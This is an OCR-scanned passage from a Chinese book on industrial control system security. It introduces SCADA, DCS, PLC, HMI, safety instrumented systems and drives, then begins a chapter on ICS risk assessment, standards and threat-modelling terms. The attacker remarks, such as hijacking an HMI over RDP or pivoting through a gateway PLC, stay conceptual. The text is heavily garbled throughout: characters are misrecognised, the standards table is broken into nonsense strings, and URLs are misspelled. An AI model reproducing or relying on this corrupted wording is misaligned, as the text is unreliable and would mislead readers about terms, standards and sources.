系统 中 断 时 ， 保 护 系统 不 会 出 现 危险 故障 的 层次 。 在 功能 安全 层 内 有 若干 工程 保护 层 (engineered layers of protection) 。 这 些 保护 层 包括 了 从 逻辑 编码 
的 “ 互 锁 ”， 到 PLC 中 关于 如 何 响应 不 良 事 件 的 指令 ， 再 到 安全 仪表 系统 (SIS) 与 物理 安全 控制 措施 ， 例 如 在 指定 的 过 程 中 确保 诸如 压力 过 高 等 条 件 不 会 发 生 的 
ZER. 
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图 1-3 说 明了 所 有 这 些 层次 是 如 何 协同 工作 共同 对 整个 过 程 进行 管理 的 。 入 侵 工 控 系 统 不 仅 需 要 详细 了 解 所 有 层次 的 功能 以 及 它们 之 间 的 相互 作用 ， 还 需要 了 
解 工 业 通 信 协 议 本 身 的 知识 以 便 对 攻击 进行 传播 。 


1.2.5 ”常用 控制 系统 、 设 备 和 组 件 的 类 型 


本 章 到 目前 为 止 , 我 们 已 经 提 到 了 多 种 类 型 的 控制 系统 。 本 节 将 对 一 些 更 加 常用 的 工控 系统 设备 进行 探讨 。 虽 然 我 们 并 未 做 详尽 描述 ， 但 是 通过 本 节 内 容 能 
够 使 读者 对 于 这 些 组 件 是 什么 ， 以 及 它们 在 工控 系统 环境 中 所 处 的 位 置 有 一 个 基本 的 了 解 。 需 要 注意 的 是 ， 目 前 许多 定义 和 区 分 还 和 存在 和 争议， 有些 人 融 认 为 许多 
功能 可 以 由 相同 的 设备 提供 。 例 如 ， 过 去 普遍 认为 PLC 的 处 理 能 力 比 较 低 ， 但 今天 的 PLC 构 建 于 强大 和 健壮 的 硬件 之 上 ， 处 理 能 力 已 不 可 同日 而 语 。 而 且 将 PLC 与 
现代 人 机 界面 相 组 合 ， 然 后 做 一 个 箱子 把 它们 全 放 进 去 ,这样 的 组 合 可 以 实现 DCS 的 许多 功能 ,尽管 专 业 的 DCS 厂 商 可 能 很 快 会 束 这 一 事实 提出 异议 。 
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图 1-3 ”工控 系统 运行 操作 概览 (NIST SP800-82, 2006) 


1. 监 控 与 数据 采集 系统 

由 于 党 被 用 来 指 代 一 般 的 工控 系统 ， 监 控 与 数据 采集 系统 (SCADA) 可 能 是 过 度 使 用 最 为 广泛 的 术语 了 。SCADA 系 统 主要 是 指 在 广阔 的 地 理 区 域 中 一 组 不 同 
类 型 的 工控 系统 设备 ， 如 图 1-4 所 示 。 可 以 将 SCADA 系 统 看 作 是 构成 整个 工控 系统 的 所 有 独立 的 控制 和 通信 组 件 的 总 和 。SCADA 环 境 的 经 典 实例 包括 供水 系统 、 
天 然 气管 道 输送 系统 ， 以 及 电力 传输 和 配送 系统 等 。 


2. 集 散 控 制 系统 


通常 ， 大 型 系统 使 用 集散 控制 系统 (DCS) 实现 对 大 型 设施 (如 石油 和 天 然 气 精炼 三 及 化 工厂 ) 中 的 数 干 个 |/O 节 点 的 自动 控制 。DCS 和 SCADA 之 间 的 差异 
十 分 微小 ， 但 是 传统 上 SCADA 更 多 地 用 于 控制 分 散在 不 同 地 理 位 置 上 的 操作 ， 如 供水 、 污 水 处 理 或 输 配 电 系 统 ， 而 DCS 通 常 部 署 在 工厂 厂区 内 。DCS 的 一 些 特性 
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使 其 非常 独特 。DCS 通 常 是 高 度 工程 化 的 刚性 系统 ， 需 要 严格 按照 厂商 指定 的 方式 进行 部 署 和 搭建 。 


DCS 将 基于 Unix、Linux 或 Microsoft 的 终端 结合 起 来 作为 工作 站 实现 对 过 程 的 观察 与 控制 ， 并 且 通 常 与 元 余 网 络 相连 接 ， 其 中 宛 余 网 络 利 用 多 宿主 计算 机 和 
网 络 交换 技术 以 提供 高 可 用 性 。DCS 系 统 的 实例 包括 Honeywell 公 司 出 品 的 FTE 控 制 网 络 和 Emerson 公 司 开发 的 DeltaV 系 统 等 。 
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图 1-4 _ SCADA 系统 概览 (NIST SP800-82, 2006) 


3. 可 编程 序 控 制 器 

可 编程 序 控制 器 (PLC) 是 工业 自动 化 领域 中 的 “ 老 黄牛 ”， 几 乎 在 每 个 工厂 中 都 可 以 找到 PLC。PLC 通 常 被 称 为 “控制 器 ”， 广 泛 应 用 于 工厂 环境 和 很 多 看 
似 不 太 可 能 的 地 方 ， 例 如 电梯 、 机 场 的 下 道 控 制 ， 甚 至 我 们 驾驶 的 汽车 中 也 包含 PLC，PLC 包 含 三 个 主要 组 件 : 微 控制 器 : 扩展 插 槽 和 背 板 ， 其 体积 可 以 从 成 人 拳 
头 大 小 到 小 型 台式 计算 机 的 尺寸 ，PLC 的 外 形 如 图 1-5 和 图 1-6 所 示 。 
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图 1-5 MicroLogix 1100 PLC 
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图 1-6 Siemens Simatic S7-1500 PLC 
微 控制 器 (microcontroller) 是 PLC 的 大 脑 ， 包 含 固件 、 程 序 (通常 是 梯形 逻辑 ) 和 设 定点 。 传 统 PLC 中 的 固件 和 控制 器 程序 大 多 是 静态 的 。 设 定点 就 是 运 
行程 序 配置 时 使 用 的 变量 ， 既 可 以 手工 改变 也 可 以 根据 过 程 状 态 动态 改变 。 


除了 微 控制 器 ， 通 常 还 有 扩展 槽 或 模块 接口 用 于 对 PLC 的 功能 进行 扩展 。 这 些 模 块 包括 : 


. 多 种 网 络 类 型 ， 如 以 太 网 、 远 程 I/JO、ConttolNet、PROFINET 或 其 他 网 络 类 型 

802.11、802.15.4 或 其 他 网 络 类 型 的 无 线 扩 展 

连接 到 现场 设备 的 数字 或 模拟 I/O 卡 

" 其 他 模块 如 机 架 防火 墙 或 网 关 

将 所 有 这 些 部 件 连 在 一 起 的 是 背 板 (backplane) ， 由 硬 线 接口 对 多 个 设备 和 微 控 制 器 之 间 的 通信 提供 支持 。 这 一 点 非常 重要 ， 无 论 是 网 络 安全 分 析 师 还 是 
攻击 者 都 必须 对 背 板 和 控制 器 的 工作 方式 加 以 了 解 。 例 如 ，PLC 可 以 部 署 用 作 控 制 输送 系统 中 的 驱动 器 组 的 控制 器 。 或 者 模块 相同 、 程 序 不 同 的 同一 块 PLC 也 可 以 


简单 地 用 来 将 多 种 类 型 的 网 络 聚合 在 一 起 。 昌 然后 者 没有 “控制 ”功能 ， 但 它 本 身 融 可 能 成 为 一 个 重要 的 攻击 目标 ， 以 该 PLC 为 跳板 ， 攻 击 者 能 够 从 以 太 网 世界 
无 颖 跳 转 到 其 他 忆 线 型 网 络 。 


4. 人 机 界面 


人 机 界面 (Human-Machine Interface, HMI) 是 工控 系统 的 “画面 ”。 人 机 界面 可 以 像 驱 动 器 机 箱 外 部 的 小 面板 一 样 简 单 。 大 多 数 情 况 下 ， 人 机 界面 使 用 
键盘 或 触摸 屏 显示 器 ， 以 图 形 方式 刻画 整个 过 程 ， 并 人 允许 操作 员 末 用 输入 特定 组 件 命令 的 方式 对 过 程 中 的 各 个 点 进行 控制 。 图 1-7 显 示 了 精 馏 塔 的 常见 图 形 表 示 ， 
这 是 许多 化 工厂 和 石油 天 然 气 精炼 厂 的 常见 过 程 。 
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图 1-7 ”典型 人 机 界面 示意 图 


从 攻击 者 的 角度 来 看 ， 人 机 界面 通常 是 过 程 中 的 所 有 自动 控制 点 的 图 形 化 展示 。 攻 击 者 如 果 想 找到 一 个 简单 的 方法 对 过 程 进行 攻击 ， 首 先 融会 把 注意 力 聚 焦 


在 这 里 ， 并 设法 接管 人 机 界面 的 显示 。 虽 然 这 会 是 一 个 “充满 噪声 ”的 网 络 攻 击 ， 但 攻击 者 可 以 部 署 一 个 RDP 会 话 ， 然 后 同 过 程 进行 交互 ， 惑 像 任何 一 名 操作 员 
在 同一 控制 台 前 所 做 的 一 样 。 


5. 安 全 仪表 系统 


当 系 统 未 按 计划 执行 时 束 会 用 到 安全 仪表 系统 (Safety Instrumented Systems, SIS) 。SIS 是 精心 设计 的 专用 控制 系统 。 通 常 广 商会 使 用 他 们 现 有 的 PLC 平 
台 来 构建 S1S。 除 了 核心 微 控制 器 以 外 ，SIS 用 到 了 一 系列 复杂 的 组 件 ， 其 中 既 包 括 模 拟 组 件 也 包括 数字 组 件 ， 然 后 采用 二 选 一 或 者 三 选 二 的 投票 方式 对 系统 进行 
监视 并 对 不 利 的 过 程 条 件 进行 响应 。 通 常 S1S 的 设计 理念 是 仪 提供 少 数 几 个 核心 功能 ， 即 将 过 程 恢复 到 安全 状态 或 者 在 硬件 故障 的 情况 下 将 系统 正常 天 闭 。 


值得 注意 的 是 ，sls 在 许多 工控 系统 环境 中 并 未 被 广泛 使 用 。 长 久 以 来 ， 只 有 当 硬 件 故 障 的 可 预测 发生 率 表明 ， 在 给 定时 间 段 内 随机 故障 将 导致 奉 干 次 危险 状 
况 时 ， 才 会 用 到 SIS。 而 如 果 统 计 结 果 显示 不 太 可 能 发 生 足 以 导致 不 安全 状态 的 随机 硬件 故障 时 ， 则 通常 不 使 用 SIS。 这 一 点 很 关键， 因为 到 目前 为 止 ， 安 全 界 主 
要 关注 随机 硬件 故障 。 虽 然 安全 标准 确实 强调 了 安全 问题 ， 但 是 直到 现在 才 有 一 些 可 靠 的 研究 成 果 指出 : 即便 随机 硬件 故障 的 概率 还 没有 高 到 部 署 S1S 的 条 件 ， 但 
是 明确 的 网 络 安全 威胁 的 可 能 性 也 已 经 足以 表明 ， 我 们 应 该 使 用 更 加 健壮 的 SIS 取 代 PLC 或 者 与 PLC 协 同 工 作 。 


变频 驱动 器 (Variable Frequency Drives, VFD) 本 质 上 就 是 “智能 ”电机 。 它 们 是 小 规模 PLC 的 一 种 变形 形式 ， 也 被 称 为 驱动 器 控制 器 (drive 
controller) 。 在 变频 驱动 器 中 存在 一 个 程序 ， 该 程序 要 么 响应 手动 输入 ， 要 么 响应 控制 程序 的 请 求 来 改变 其 所 连接 的 驱动 器 的 速度 。 无 论 是 工控 系统 网 络 研 究 人 
员 还 是 攻击 者 都 对 这 样 的 驱动 器 控制 器 非常 感 兴趣 ， 因 为 它 运 行 起 来 同 PLC 非 常 相似 ， 并 且 可 以 被 类 似 的 方式 所 攻击 ， 而 且 由 于 变频 驱动 器 通常 控制 的 设备 是 大 
规模 驱动 器 ， 因 此 会 直接 导致 严重 的 后 果 。 可 以 通过 改变 施加 到 驱动 器 的 频率 和 电压 来 操纵 变频 驱动 器 的 运行 速度 和 方向 。 图 1-8 是 VFD 的 一 个 实例 。 


图 1-8 VED 


工业 物 联网 (lloT) 又 是 什么 呢 ? 


工业 互联 网 (Industrial Internet) 和 工业 物 联网 (Industrial Internet of Things, HoT) 这 两 个 术语 最 近 已 经 成 为 市 场 中 的 热门 词汇 。 虽 然 这 些 术语 在 媒体 、 销 售 
以 及 宣传 画册 中 越 来 越 流 行 ， 但 是 很 少 在 实际 运营 环境 中 用 它们 来 描述 工控 系统 。IIoT 是 物 联 网 (Internet of Things, IoT) 的 一 种 变形 ， 用 于 描述 通过 互联 网 连接 
的 多 个 “智能 设备 (通常 是 浴 入 式 设备 ) 。 这 样 的 设备 包括 用 于 消费 领域 的 智能 温 挖 仪表、 智能 家 电 、 汽 车 零 部 件 甚至 医疗 器 械 等 。 近 来 市 场 营 销 活动 已 经 开 
始 将 工控 系统 设备 与 物 联 网 联系 在 一 起 ， 因 为 它们 都 是 通过 网 络 进行 通信 的 误 入 式 设备 。 随 着 智能 电网 和 智能 电表 的 出 现 ， 工 控 系 统 设备 与 物 联 网 的 关联 最 可 能 
出 现在 电力 行业 中 。 这 反 过 来 又 扩展 到 几乎 所 有 工控 系统 设备 中 。 在 物 联网 前 加 上 工业 二 字 ， 嘿 ! 一 个 新 的 热门 词汇 就 诞生 了 。 

使 用 “工业 物 联 网 ”进行 描述 的 问题 在 于 ，“ 联 网 ”一 词 同 运营 商 所 遵循 的 工业 网 络 安全 标准 相悖 。 工 控 系 统 设 备 和 系统 不 与 互联 网 相连 是 工业 网 络 安全 标 
准 的 核心 前 提 与 要 求 。 事 实 上 ， 这 一 概念 的 提出 甚至 早 于 现代 工控 系统 网 络 安全 标准 。 与 任何 一 位 控制 系统 工程 师 或 工厂 经 理 谈 到 这 一 点 时 ， 大 多 数 人 会 告 
你 ，“ 千 万 不 能 这 样 做 ! ”所 以 用 互联 网 去 描述 工控 系统 会 被 视 为 对 工厂 车 间 和 操作 员 控 制 室 的 订 渎 。 尽 管 远程 工控 系统 和 SCADA 系 统 会 通过 专用 网 络 进行 通 
信 ， 但 从 工控 系统 和 感知 风险 的 角度 来 看 ， 这 些 东西 同 互联 网 不 是 一 回 事 。 

也 许 有 人 要 说 这 是 在 吹 毛 求 疫 ， 但 工业 物 联网 是 一 个 从 “以 IT 为 中 心 ”的 思维 定 势 出 发 而 设计 出 来 的 术语 ， 没 有 考虑 对 待 工厂 安全 极为 认真 的 操作 人 员 的 想 
法 。 如 果 不 想 在 工控 系统 风险 评估 或 渗透 测试 期 间 被 返 出 操作 环境 ， 那 么 最 好 避免 在 与 工程 师 、 资 产 所 有 者 以 及 工厂 经 理 交 谈 时 使 用 “Internet ”一 词 来 描述 工控 


系统 。 


1.3 ”本 章 忆 结 


本 章 探讨 了 典型 的 工控 系统 环境 ， 以 及 今天 工厂 中 常见 的 主要 组 件 和 术语 。 虽 然 这 只 是 对 自动 化 领域 的 一 个 简要 介绍 ， 但 这 些 概 念 是 理解 本 书 中 讨论 的 所 有 
内 容 的 基础 。 
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eee ”工业 控制 系统 风险 评估 


渗透 测试 最 主要 的 用 途 之 一 是 作为 整体 风险 评估 过 程 的 一 部 分 ， 特 别 是 在 工控 系统 环境 下 更 是 如 此 。 风 险 评估 过 程 中 的 多 项 任务 协同 工作 ， 为 最 后 的 风险 计 
算 步 又 提供 所 需 的 数据 ， 帮 助 制订 风险 缓解 策 略 。 确 定 实 施 一 次 成 功 的 攻击 或 者 安全 事件 的 “可 能 性 ”是 最 后 风险 计算 步骤 的 典型 特征 和 主要 组 成 部 分 。 同 时 ， 
即便 希望 通过 首先 定位 最 直接 和 影响 最 大 的 威胁 来 提高 攻击 效率 和 成 本 效益 ， 那 么 确定 成 功 攻击 事件 的 “可 能 性 ”对 于 风险 缓解 策略 来 说 也 是 至 天 重要 的 ,尤其 


在 资源 (预算 和 人 员 ) 有 限 的 情况 下 更 是 如 此 。 渗 透 测试 通常 是 确定 该 “可 能 性 ”最 准确 的 方法 ， 并 且 在 整个 风险 评估 中 收集 的 大 部 分 数据 都 可 以 用 来 制订 渗透 
测试 策略 。 所 以 ， 了 解 整个 风险 评估 过 程 ， 以 及 数据 的 采集 方式 和 数据 如 何 有 助 于 制订 渗透 测试 策略 (反之 亦 然 ) 非 党 重要 。 


虽然 本 书 无 法 涵盖 整个 风险 评估 过 程 中 的 每 个 步骤 的 全 部 细节 ， 但 重要 的 是 了 解 风险 评估 过 程 中 所 涉及 的 步骤 ， 以 及 如 何在 工控 系统 风险 评估 过 程 中 开展 渗 
透 测试 ， 以 获得 更 有 针对 性 、 更 高 效 和 更 具 成 本 效益 的 风险 缓解 策略 。 同 时 还 需要 了 解 如 何以 不 对 工控 系统 生产 环境 造成 影响 的 方式 进行 数据 采集 。 本 章 将 从 一 
个 较 高 的 层次 来 讨论 风险 评估 过 程 中 的 各 个 步骤 ， 对 于 工控 系统 所 特有 的 步骤 、 方 法 和 技巧 ， 还 将 会 做 进一步 深入 探讨 。 


2.1 工控 系统 风险 评估 入 门 


最 近 几 年 产业 界 对 于 “风险 评估 ”的 内 容 和 定义 出 现 了 多 种 提 法 ， 对 于 “风险 评估 ”到 | 底 是 什么 也 产生 了 诸多 误解 。 风 险 评 估 通 常 也 被 称 为 “差距 分 析 ”、 
“审计 ”和 “脆弱 性 评估 ”。 昌 然 对 于 风险 评估 过 程 所 涉及 的 具体 技术 以 及 在 各 个 步骤 的 执行 顺序 上 和 存在 一 定 的 灵活 性 ,但 是 对 于 风险 评估 到 | 底 需 要 哪些 工作 以 
及 风险 评估 应 该 如 何 开展 等 问题 ， 倒 确实 存在 众多 行业 定义 的 标准 。 然 而 ， 对 于 那些 能 够 熟练 掌握 实际 风险 评估 工作 所 涉及 哪些 内 容 的 评估 人 员 而 言 ， 则 通常 面 
临 着 如 何在 众多 “风险 度量 标准 ”和 评分 方法 中 进行 选择 的 难题 。 


本 节 将 概要 介绍 风险 评估 的 内 容 和 定义 、 风 险 评估 度量 对 象 及 风险 评估 所 涉及 的 过 程 等 内 容 。 
2.1.1 ”难以 确定 的 工控 系统 “风险 度量 标准 ” 


天 于 风险 评估 的 讨论 经 常会 涉及 通用 工控 系统 网 络 安全 “风险 度量 标准 ”。 这 个 问题 在 各 种 邮件 列表 、 论 坛 以 及 行业 会 议 上 被 一 次 又 一 次 地 提 到 。 多 次 有 人 
在 演讲 中 声称 找到 了 问题 的 答案 。 但 在 工控 系统 领域 里 ， 这 些 提 法 如 果 不 是 为 了 转移 注意 力 而 做 出 故意 曲解 的 话 ， 似 乎 都 是 无 法 实现 的 空中 楼 内 。 而 事实 上 ， 工 
控 系 统 环 境 中 能 被 普遍 接受 的 网 络 安全 风险 度量 标准 非常 难以 确定 ， 并 且 有 可 能 永远 都 无 法 实现 。 这 在 很 大 程度 上 是 因为 很 多 公司 的 业务 目标 和 运营 环境 多 样 化 
程度 很 高 ， 而 任何 度量 标准 都 不 单单 只 高 度 依赖 于 这 些 目标 和 环境 ， 同 时 还 依赖 于 许多 其 他 因素 。 一 套 “ 均 码 ” 的 度量 标准 根本 行 不 通 。 


因此 ， 各 个 公司 应 该 针对 自身 环境 制订 出 自己 独 有 的 评分 标准 。 这 些 度量 标准 应 该 根据 本 章 对 过 程 与 方法 的 讨论 结果 进行 评分 。 在 第 10 草 中 将 就 更 多 内 容 展 
开 详 细 讨 论 。 


2.1.2 ”风险 评估 标准 


有 很 多 种 公认 的 风险 评估 标准 和 最 佳 实践 (根据 用 户 所 在 行业 的 不 同 ， 部 分 行业 甚至 会 出 台风 险 评估 与 管理 要 求 ) 。 然 而 ， 大 多 数 这 些 标准 文档 适用 于 信息 
安全 风险 ,没有 考虑 与 运营 安全 风险 相关 的 细节 和 差异 ， 而 运营 安全 风险 恰恰 适用 于 制造 业 和 工业 系统 。 表 2-1 中 概括 了 常见 的 风险 评估 与 管理 标准 及 最 佳 实践 。 


表 2-1 风险 评估 和 管理 标准 及 最 佳 实践 


组 g 出 版 物 编号 描 述 
国际 标准 化 组 织 / 国际 电工 委员 会 (ISO/IEC) | 31010 风险 评估 技术 
ISO/IEC 信息 安全 风险 管理 
ISO/IEC 31000 风险 管理 


括 国 国家 标准 与 技术 研究 院 (National Institut Re 
美国 国家 标准 与 技术 研究 院 (National Institute 风险 评 佳 实施 指南 
of Standards and Technology, NIST) 

NIST SP 800-37 联邦 信息 系统 风险 管理 框架 应 用 指南 


NIST SP 800-39 信息 安全 风险 管理 : 组 织 、 任 务 与 信息 系统 视角 


i) 
© 
© 
A 


NIST SP 800-161 联邦 信息 系统 与 组 织 供 应 链 风 险 管理 实践 


更 国 标准 协会 ( British Standards Institution, 
BSI) 


© 
7 
W 


基于 IT- 基线 的 风险 分 析 


组 A 出 版 物 编号 fii $ 


计算 机 应 急 响应 中 心软 件 工程 研究 所 (Software 操作 的 关键 威胁 ， 资 产 与 脆弱 性 评 
应 中 心 en OCTAVE ATPRTEN ER, GET Mes EPEA 


Engineering Institute, CERT ) 


欧洲 网 络 与 信息 安全 管理 局 (European Union 
Agency for Network and Information Security, 风险 管理 与 风险 评估 方法 和 工具 的 原则 和 清单 
ENISA) 


从 表 2-1 中 可 以 看 出 ， 可 用 的 风险 评估 标准 数量 多 、 使 用 复杂 ， 并 且 也 缺乏 针对 工控 系统 的 适用 性 ， 从 而 导致 许多 相关 术语 的 定义 和 使 用 存在 混淆 ， 同 时 也 缺 
乏 通 用 的 、 行 业 公认 的 风险 评估 方法 。 因 此 ， 本 章 的 主要 目标 之 一 是 通过 对 表 2-1 中 所 列 出 版 物 中 的 风险 评估 过 程 进行 介绍 ， 进 而 大 幅 降低 风 险 评估 相关 工作 的 复 
杂 程 度 。 这 样 做 的 目的 在 于 通过 对 行业 普遍 接受 和 认可 的 风险 评估 方法 和 模型 中 的 核心 概念 进行 凝练 ， 提 出 一 种 简单 并 且 易 于 理解 的 风险 评估 方法 ， 同 时 这 些 方 
法 、 模 型 需要 切合 并 适用 于 工控 系统 场景 。 


213 ”工控 系统 风险 评估 中 评价 和 测量 的 内 容 


许多 关于 工业 网 络 安全 的 探讨 往往 最 终 都 会 沙 到 功能 安全 (safety) 上 ， 因 为 功能 安全 是 系统 运行 的 基石 之 一 。 这 一 概念 在 根本 上 得 到 了 国际 工业 标准 中 术 
语 功能 安全 (functional safety) 的 支持 ,例如 IEC61508/61511 和 ANSI/ISA84.00.01 标 准 ， 定 义 了 通用 意义 上 的 风险 识别 过 程 ， 其 中 包括 过 程 危险 性 分 析 
(Process Hazard Analysis, PHA) 和 危险 性 与 可 操作 性 分 析 (Hazards and Operability Analysis, HAZOP) 。 然 后 ， 使 用 诸如 健康 、 安 全 与 环境 管理 系统 
(Health, Safety, and Environment, HSE) 和 安全 仪表 系统 (Safety Instrumented Systems, SIS) 等 安全 系统 来 降低 风险 。 因 此 ， 多 项 工业 安全 标准 ( 相 
天 内 容 将 在 第 9 章 中 讨论 ) 都 从 风险 识别 与 管理 的 角度 对 运营 安全 问题 进行 了 讨论 并 给 出 了 解决 方案 。 


功能 安全 是 工控 系统 安全 的 主要 目标 ， 并 且 也 应 该 是 工控 系统 安全 的 主要 目标 。 在 许多 工控 系统 环境 中 ， 运 营 商 已 经 开始 将 信息 安全 与 功能 安全 同等 看 待 。 
虽然 功能 安全 仍然 是 一 个 更 为 紧迫 的 问题 ， 但 一 些 公司 已 经 开始 定期 开展 信息 安全 培训 ， 丈 像 定 期 开展 功能 安全 培训 一 样 。 但 是 ,在 考虑 风险 缓解 策略 时 ， 功 能 
安全 不 应 该 是 唯一 的 动力 ;， 同 时， 也 不 应 该 认为 信息 安全 必然 市 来 功能 安全 。 正 如 在 构建 风险 场景 (这 一 点 将 在 后 文中 介绍 ) 时 就 应 该 注意 到 的 : 除了 与 功能 安 
全 有 天 的 事件 之 外 ， 网 络 攻击 还 有 可 能 造成 其 他 负面 影响 ;与 之 类 似 ， 除 了 网 络 攻击 之 外 ， 还 有 其 他 东西 同样 可 能 引发 功能 安全 事件 。 此 外 ， 当 友 起 网 络 攻击 试 
图 导致 安全 事件 时 ， 功 能 安全 系统 并 不 一 定 融会 确保 功能 安全 事件 不 会 友 生 。 


有 些 “风险 评估 ” 仪 仪 将 度量 和 评分 建立 在 对 安全 控制 措施 (以 及 安全 控制 措施 是 否 缺 失 ) 的 评估 之 上 ， 该 过 程 大 多 基于 对 行业 网 络 安全 标准 进行 “ 审 
计 ” 或 “差距 分 析 ” 的 方法 来 实现 。 这 在 工控 系统 业界 尤为 常见 。 然 而 ， 这 是 一 种 评估 效果 非常 孤立 并 且 有 限 的 方法 。 被 认定 的 “差距 ”只 是 根据 推断 有 可 能 导 
致 “ 脆 弱 性 ”， 并 且 必 然 缺少 具体 的 数据 来 解释 脆弱 性 利用 的 “可 能 性 ”。 这 种 模棱两可 的 方法 也 可 能 导致 “ 漏 报 ”而 忽视 真正 存在 的 差距 和 脆弱 性 。“ 合 规 性 
并 不 等 于 安全 性 ” (Compliance doesn’ t necessarily equal security.) 是 一 个 由 来 已 久 的 争论 ， 而 上 文 提 到 的 内 容 则 又 为 这 一 论断 提供 了 一 个 令 人 信服 的 例 
证 。 


即使 同时 开展 了 脆弱 性 评估 〈 例 如 ， 配 置 审查 、 漏 洞 映射 或 者 利用 难得 的 机 会 实施 了 漏洞 扫描 ) ， 通常 也 无 法 对 脆弱 性 进行 充分 验证 或 者 将 其 置 于 适当 的 基 
于 场景 的 环境 中 。 因 此 ， 脆 弱 性 利用 的 “可 能 性 ”和 “影响 ”依靠 推测 的 程度 仍然 比较 高 。 事 实 上 ， 风 险 的 定义 (我们 将 在 稍 后 研究 ) 本 身 已 经 暗示 ， 如 果 没 有 
考虑 “可 能 性 ”， 那 么 实际 上 束 不 算 开展 了 “风险 评估 ”。 


均衡 的 工控 系统 风险 评估 策略 应 当 同 时 考虑 到 功能 安全 和 操作 安全 ， 以 及 安全 控制 措施 和 脆弱 性 。 但 其 中 还 应 当 包 含 一 个 整体 性 更 强 、 绪 合 性 更 高 的 方法 ， 
这 融 涉 及 到 了 以 下 内 容 : 对 策略 、 过 程 、 安 全 控制 的 审查 ， 以 及 对 资产 、 系 统 、 通 信 路 径 与 攻击 向 量 、 脆 弱 性 以 及 威胁 源 的 识别 。 所 有 这 些 信息 最 终 都 会 被 用 来 
构建 针对 评估 环境 的 可 行 风 险 场景 。 然 后 ， 对 这 些 风险 场景 (也 被 称 为 攻击 场景 和 攻击 树 ) 、 而 不 是 对 那些 孤立 的 脆弱 性 和 差距 进行 评估 和 打分 ， 这 就 对 “可 能 
性 ”属性 做 出 了 更 为 准确 的 解释 ,这 反 过 来 又 帮助 制订 优先 级 更 高 、 针 对 性 更 强 、 成 本 效益 更 优 的 风险 缓解 策略 。 实 质 上 ， 一 次 筹划 无 误 、 执 行 正 确 的 综合 风险 
评估 在 很 大 程度 上 融 是 一 次 威胁 建 模 。 
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威胁 建 模 这 个 概念 已 经 存在 了 一 段 时 间 ， 并 且 已 经 提出 了 一 些 众 所 周知 的 威胁 建 模 方法 (例如 ，OWASP 组 织 提出 的 方 
法 https://www.owasp.org/index.php/Threat_Risk_Modeling 和 微软 公司 提出 的 方法 https://www.mictosoft.com/en-us/sdl/adopt/threatmodeling.aspx) 。 虽 然 当 前 现 有 的 
很 多 资源 只 是 针对 于 特定 类 别 的 威胁 建 模 ， 例 如 应 用 程序 的 威胁 建 模 或 者 情报 界 使 用 的 威胁 建 模 ) 。 尽 管 如 此 ， 第 2 章 和 第 3 章 并 不 会 试图 去 消除 这 些 不 同方 法 之 
间 的 差异 ， 而 是 着 力 于 描述 针对 工控 系统 的 “威胁 模型 ”过 程 ， 而 这 一 过 程 也 将 为 总 体 的 工控 系统 风险 评估 提供 信息 。 我 们 希望 读者 不 会 因为 特定 的 术语 或 者 不 
同方 法 之 间 的 差异 而 纠结 。 


考虑 到 在 整个 风险 评估 过 程 中 必须 采集 与 分 析 的 所 有 信息 ， 风 险 评估 看 起 来 是 一 项 令 人 生 虹 的 任务 。 那 么 应 该 如 何 来 实施 呢 ? 正 如 我 们 已 经 指出 的 ， 当 前 已 
经 有 大 量 的 标准 、 认 证 和 出 版 物 为 如 何 有 效 地 评估 和 降低 风险 提供 了 指导 。 其 中 的 许多 标准 、 认 证 和 出 版 物 的 确 提供 了 与 本 文 所 提 到 的 整体 方法 相 一 致 的 指导 ， 
但 是 这 些 指导 往往 隐藏 在 复杂 的 语言 和 隐 长 的 叙述 之 中 。 不 过 即便 如 此 ， 这 些 指导 都 一 个 拥有 共同 的 前 提 ， 那 残 是 ， 它 们 为 我 们 应 该 度量 哪些 内 容 提供 了 指导 ， 


并 且 这 些 指导 与 本 书 中 所 提出 的 整体 方法 相 一 致 。 这 一 前 提存 在 于 最 普遍 接受 的 风险 概念 之 中 。 无 论 采 用 哪些 具体 术语 予以 表述 ， 风 险 在 总 体 和 概念 上 都 可 以 定 
MA: 


由 于 目标 对 象 中 所 存在 的 潜在 脆弱 性 ， 威 胁 源 通过 威胁 向 量 导致 威胁 事件 发 生 的 可 能 性 ， 以 及 由 此 而 产生 的 后 果 和 影响 。 
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风险 的 这 种 定义 形式 也 将 作为 模板 用 于 后 文中 攻击 树 和 风险 场景 的 构建 。 


因此 ， 风 险 评估 旨 在 通过 对 之 前 定义 中 所 强调 的 属性 进行 评估 来 确定 风险 级 别 。 这 一 定义 看 起 来 可 能 让 人 有 些 不 解 ， 下 面 对 定 义 中 所 涉及 的 属性 逐个 进行 说 
明 ， 看 看 这 些 属性 到 底 指 的 是 什么 : 

- 威胁 源 (threat source) : 威胁 源 是 指 发 起 攻击 事件 的 人 或 事物 。 有 时 威胁 源 也 被 称 之 为 威胁 发 起 方 (threat actor) ， 但 是 如 果 在 风险 评估 过 程 中 需要 考虑 
非 人 为 因素 导致 的 安全 事件 ， 例 如 自然 灾害 等 ， 那 么 威胁 发 起 方 的 叫 法 从 技术 上 来 说 是 不 准确 的 。 当 考虑 人 类 威胁 源 时 ， 威 胁 源 也 并 不 一 定 非 得 具有 恶意 的 意 
图 。 例如， 威胁 源 也 可 以 是 指 犯 了 错 的 操作 员 或 者 工程 师 。 


目标 对 象 (target) : 目标 对 象 的 定义 相对 来 说 不 言 自明 。 目 标 对 象 通 常 是 指 受 威胁 源 影 响 的 人 员 或 资产 。 一 些 威胁 建 模 方法 中 的 资产 lasset) 通常 是 指 在 
信息 技术 场景 中 有 价值 的 东西 ， 例 如 SQL 数 据 库 中 的 数据 、 计 算 机 的 处 理 能 力 以 及 加 密 密 钥 等 。 


脆弱 性 (vulnerability) : 脆弱 性 是 指 威 胁 源 能 够 对 目标 对 象 造成 影响 的 条 件 ， 这 些 条 件 通 常 是 弱点 (例如 ， 错 误 的 配置 、 编 写 凌乱 的 代码 、 人 的 自满 情绪 
或 者 没有 锁 好 的 门 ) 。 


- 威胁 同 量 (threat vector) : 威胁 向 量 是 指 威 胁 源 利用 脆弱 性 的 途径 (例如 ，Web 页 面 、 开 放 的 网 络 端口 、USB 接 口 、 电 子 邮件 或 者 Web 浏 览 器 ) 。 


- 威胁 事件 (threat event) : 威胁 事件 是 指 对 目标 对 象 产生 影响 的 事件 。 通 常 是 指 具有 恶意 意图 的 网 络 攻击 或 漏洞 利用 ,但 也 可 以 是 自然 事件 (如 暴风 十 
或 洪水 ) ， 或 者 意外 事件 (如 施工 队 在 施工 过 程 中 破坏 了 管道 ) 。 


